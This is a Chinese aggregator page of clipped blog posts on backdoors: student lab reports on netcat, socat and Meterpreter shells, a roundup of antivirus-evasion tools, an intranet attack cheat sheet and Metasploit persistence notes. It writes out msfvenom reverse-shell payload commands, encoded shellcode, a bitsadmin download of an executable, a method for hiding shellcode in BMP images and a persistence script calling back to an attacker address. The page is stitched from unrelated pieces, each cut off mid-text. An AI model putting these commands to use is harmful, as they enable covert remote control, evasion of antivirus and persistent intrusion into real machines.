meterpreter

2019-2020-2 网络对抗技术 20175217 Exp2 后门原理与实践

怎甘沉沦 提交于 2020-03-13 01:40:17
一、实验目标 清楚后门概念 会用nc获取远程主机的Shell 会用meterpreter 会启动后门 二、实验内容 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell 三、基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 当捡到一个U盘时,会尝试着插入自己的电脑,当U盘插入后后门可能进入系统 当下载一个软件时,后门可能同时被安装在你的系统中了 当你在网页上点击一个按钮时,后门可能会被安装在你的电脑里 例举你知道的后门如何启动起来(win及linux)的方式? 在开机的时候自启动(Windows注册表) 被设置了定时启动(Linux的crontab) 作为服务启动 被其他主机控制,从而启动 Meterpreter有哪些给你映像深刻的功能? 除了本次实验中完成的获取被控主机的录音、录像、截图、键盘输入记录等功能,还有从被控主机上对相关的文件进行下载和上传,远程操控目标机上的程序运行等功能。

2019-2020-2 20175320 《网络对抗技术》Exp2 后门原理与实践

余生颓废 提交于 2020-03-12 09:39:09
2019-2020-2 20175320 《网络对抗技术》Exp2 后门原理与实践 一、实验要求 了解nc、meterpreter以及metaspolit的使用方法,并利用以上软件实现以下操作: 1、攻击方获取被攻击方shell。 2、通过对正常软件植入后门程序,实现被攻击者运行带后门的软件时攻击者可以渗透被攻击方的系统。 3、对window以及linux进行设置,使得后门程序能在后台运行。 二、实验目标 1、使用netcat获取主机操作Shell,cron启动。 2、使用socat获取主机操作Shell, 任务计划启动。 3、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。 4、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。 三、实验过程 1.准备工作 (1)准备好windows以及linux两个虚拟机,并查看两者的ip地址。 (2)关闭windows的防火墙以及杀毒软件。 (3)两边都使用ping命令测试一下连通性。 需要注意的是,我在实验中遇到了linux无法ping通windows但windows可以ping通linux的情况。而这一问题在重新打开并关闭windows防火墙后得到了解决

免杀工具汇总

两盒软妹~` 提交于 2020-03-04 08:31:12
今天整理以前的笔记,把这部分工具整理了一下,虽然没有白利用稳,但这些工具也能在一定程度起到一定的免杀作用。 DKMC 项目地址: https://github.com/Mr-Un1k0d3r/DKMC 可以创建一个 outputs 文件夹 存放 shellcode 启动 python dkmc.py 操作顺序: Sc :是将 msf 生成的 raw 文件转换位 shellcode 代码 Gen :是将其 msf 的 shellcode 注入到 BMP 图片中 Ps :将其 BMP 的图片转换为 powershell 代码 Web :将其开启 web 功能 第一步,先生成原始的 shellcode msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.88.174 lport=7777 -e x86/shikata_ga_nai -i 16 -f raw -o /root/DKMC/dk 第二步,生成 shellcode ,将生成的 shellcode 保存到文本里,exit 退出 \xdb\xc3\xb8\xa4\x85\xc1\x7d\xd9\x74\x24\xf4\x5e\x31\xc9\xb1\xbb\x83\xee\xfc\x31\x46\x15\x03\x46\x15\x46\x70\x7f\xa8\x6b

内网攻防经典技术备忘录

冷暖自知 提交于 2020-02-26 23:04:42
前言 很早就想专门写一篇关于内网的文章,一直没有腾出空来,万万没想到,写下这篇文章的时候,竟然是我来某实验室实习的时间段:) 信息搜集 nmap扫描实时存活的ip nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips 常用命令 ipsping icmp连通性 nslookup www.baidu.com vps-ip dns连通性 dig @vps-ip www.baidu.com curl vps:8080 http连通性 tracert bitsadmin /transfer n http://ip/xx.exe C:\windows\temp\x.exe一种上传文件 >=2008 fuser -nv tcp 80 查看端口pid rdesktop -u username ip linux连接win远程桌面 (有可能不成功) where file win查找文件是否存在 找路径,Linux下使用命令find -name *.jsp来查找,Windows下,使用for /r c:\windows\temp\ %i in (file lsss.dmp) do @echo %i netstat -apn | grep

MSF(六):后渗透

三世轮回 提交于 2020-02-26 07:32:01
后渗透测试 安全牛学习Metasploit Framework笔记 一、已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二、基于已有session扩大战果 - msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 - b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe - use /exploit/mutli/reverse_tcp - set payload windows/meterpreter/reverse_tcp - exploit - 只要目标系统执行1.exe,我们即可获得反弹shell 三、获取system账号权限 (1)提权可以使用getsystem,如果没有该命令 (2)使用load priv,加载包含getsystem的priv插件(priv表示提权) (3)如果getsystem获取不到权限,基本是被UAC限制了 四、绕过UAC限制 (1)基于session获取system - use exploit/windows/local/ask - set session - set filename - set payload windows

metasploit与Cobaltstrike互相派生shell

我们两清 提交于 2020-02-23 11:22:08
https://www.cnblogs.com/test404/p/10599981.html msf 派生 shell 给 Cobalt strike(前提有一个meterpreter) msf exploit(handler) > use exploit/windows/local/payload_inject   msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http   msf exploit(payload_inject) > set DisablePayloadHandler true   msf exploit(payload_inject) > set LHOST 192.168.229.143   msf exploit(payload_inject) > set LPORT 1212   msf exploit(payload_inject) > set SESSION 1   msf exploit(payload_inject) > exploit Cobalt strike 派生 shell 给 MSF(前提有个beaconshell) msf > use exploit/multi/handler msf exploit(handler) > set

msf建立php反弹shell

眉间皱痕 提交于 2020-02-19 13:45:25
一 建立反弹后门 msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下; 将生成的木马上传到目标机中,可以远程访问; windows下asp反弹木马: root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp > shell.asp 二 监听端口建立会话 1 使用handler模块 msf > use exploit/multi/handler 2 设置payload msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp(当时windows时php换成windows) PAYLOAD =>php/meterpreter/reverse_tcp 3 设置监听主机 msfexploit(multi/handler) > set LHOST 192.168.88.155 LHOST =>192.168.88.155 4 设置监听端口(默认4444) msfexploit(multi/handler) > set LPORT 4444

Metaploit-永恒之蓝漏洞利用

那年仲夏 提交于 2020-02-17 07:03:34
目录 Metaploit介绍 实验环境 漏洞利用过程 Metaploit介绍   本次测试主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝的漏洞利用原理。永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。   进入metaploit命令:msfconsole,可以看出下面有总共有六个模块,辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块。 实验环境 攻击机 :192.168.202.132 (Kali安装Metaploit工具) 靶机 :192.168.202.131 (windows7x64未打永恒之蓝补丁且关闭防火墙) 实战漏洞利用 1.进入metaploit工具使用命令:msfconsole,可以看出下面有总共有六个模块,不同的模块功能使用的侧重点一样,在进行不同的探测之前使用不同的模块。 辅助模块

Metaploit-永恒之蓝漏洞利用

给你一囗甜甜゛ 提交于 2020-02-17 04:21:33
目录 Metaploit介绍 实验环境 漏洞利用过程 Metaploit介绍     本次测试主要是利用永恒之蓝漏洞对 windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝的漏洞利用原理。永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。   进入metaploit命令:msfconsole,可以看出下面有总共有六个模块, 辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块。 实验环境 攻击机 : 192.168.202.132 (Kali安装Metaploit工具) 靶机 : 192.168.202.131 ( windows7x64未打永恒之蓝补丁且关闭防火墙) 实战漏洞利用 1.进入metaploit工具使用命令:msfconsole,可以看出下面有总共有六个模块,不同的模块功能使用的侧重点一样,在进行不同的探测之前使用不同的模块。

Metasploit学习笔记——强大的Meterpreter

拜拜、爱过 提交于 2020-02-08 14:59:29
1. Meterpreter命令详解 1.1基本命令 使用Adobe阅读器渗透攻击实战案例打开的Meterpreter会话实验,靶机是WinXP。由于所有命令与书中显示一致,截图将书中命令记录下来。 1.2文件系统命令 1.3网络命令 1.4系统命令 2.后渗透攻击模块 2.1persistence后渗透攻击模块 示例代码如下 meterpreter > run persistence -X -i 5 -p 443 -r 10.10.10.128 [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. [!] Example: run post/windows/manage/persistence_exe OPTION=value [...] [*] Running Persistence Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/DH-CA8822AB9589_20200206.5256/DH-CA8822AB9589_20200206.5256.rc [*] Creating Payload=windows/meterpreter/reverse_tcp